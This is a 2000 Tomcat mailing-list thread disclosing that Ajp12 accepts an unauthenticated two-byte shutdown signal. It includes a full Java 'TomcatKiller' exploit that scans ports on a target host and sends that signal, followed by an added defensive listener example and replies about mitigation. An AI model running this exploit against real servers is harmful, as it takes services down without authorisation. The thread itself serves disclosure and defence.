Posted to users@tomcat.apache.org by Stuart Maclean <st...@its.washington.edu> on 2000/10/05 21:51:50 UTC
Tomcat Killer
Hi all, just a word of warning about Tomcat 3.1 and from what I can
tell, 3.2beta4. Looking at the source code, if you're using Ajp12 for
the Apache-Tomcat comms protocol, be aware that the "Stop Tomcat"
batch/shell file does its job by sending "exit please" bytes to
Tomcat. It doesn't take much to spoof this, here's my TomcatKiller
class below. Just guess a host and port which may have Tomcat
running, and over it goes...

I patched the sources so hopefully it won't happen to me ;)

import java.net.*;
import java.io.*;

public class TomcatKiller {

    static public void main( String[] args ) {

        final byte SIGNAL = (byte)254;
        final byte BYEBYE = (byte)15;
        byte[] msg = { SIGNAL, BYEBYE };

        int min = 8007, max = 8007;
        String host = args[0];

        try {
            if( args.length > 1 )
                min = max = Integer.parseInt( args[1] );
            if( args.length > 2 )
                max = Integer.parseInt( args[2] );
            if( min > max ) {
                int tmp = min;
                min = max;
                max = tmp;
            }
            for( int i = min; i <= max; i++ ) {
                try {
                    Socket s = new Socket( host, i );
                    OutputStream os = s.getOutputStream();
                    os.write( msg );
                    os.flush();
                    break;
                } catch( ConnectException ce ) {
                    System.err.println( "conn refused " + i );
                } catch( IOException ioe ) {
                    ioe.printStackTrace();
                    break;
                }
            }
        } catch( Exception e ) {
            e.printStackTrace();
            System.exit( 1 );
        }
    }
}

// eof

stu
--
Stuart Maclean, Research Associate
University of Washington
ITS Research Program, College of Engineering
Box 352500
Seattle, WA 98195-2500
Tel: (206) 543-0637
http://www.its.washington.edu
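
Added example, not part of the original post and not Tomcat's source: one way a listener can refuse the two-byte shutdown signal described above unless it comes from the local machine. The class and method names are hypothetical; the byte values and default port are the ones quoted in the post. A same-host check still trusts every local user, so it narrows the exposure rather than authenticating the sender.

```java
import java.io.IOException;
import java.io.InputStream;
import java.net.InetAddress;
import java.net.ServerSocket;
import java.net.Socket;

// Added illustration, not Tomcat source. Class and method names are hypothetical.
public class GuardedAjp12Listener {

    static final int SIGNAL = 254;   // byte values taken from the post above
    static final int SHUTDOWN = 15;

    /** Honour a shutdown request only if the peer is this machine. */
    static boolean shutdownAllowed(Socket s) {
        InetAddress peer = s.getInetAddress();
        // Loopback, or a connection from one of our own addresses to itself.
        return peer.isLoopbackAddress() || peer.equals(s.getLocalAddress());
    }

    public static void main(String[] args) throws IOException {
        int port = args.length > 0 ? Integer.parseInt(args[0]) : 8007;
        // Wildcard bind models a connector that must also serve a web server
        // on another host; binding to loopback only would be stronger still.
        try (ServerSocket server = new ServerSocket(port)) {
            while (true) {
                try (Socket s = server.accept()) {
                    s.setSoTimeout(5000);   // a silent peer must not block the loop
                    InputStream in = s.getInputStream();
                    if (in.read() != SIGNAL || in.read() != SHUTDOWN) {
                        continue;           // normal request handling would go here
                    }
                    if (shutdownAllowed(s)) {
                        System.err.println("shutdown accepted from " + s.getInetAddress());
                        return;
                    }
                    // A shutdown signal from another host is worth logging and alerting on.
                    System.err.println("shutdown REFUSED from " + s.getRemoteSocketAddress());
                } catch (IOException e) {
                    System.err.println("connection error: " + e.getMessage());
                }
            }
        }
    }
}
```
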
Re: Tomcat Killer
Posted by Steve Weiland <sw...@viatraining.com>.
It won't kill 3.2beta2 on a different host.
Steve
Re: Tomcat Killer
Posted by Sean Schofield <se...@schof.com>.
Cool find!
Couldn't this be protected against by a firewall filtering incoming traffic
so both Apache and Tomcat are behind a firewall to the Internet and
another firewall between these servers and the LAN? Then you would only
have to worry about other servlets, etc. within the firewall messing things
up. And even then I think you need root to create sockets, don't you?
Should this be posted to Bugtraq?
- schof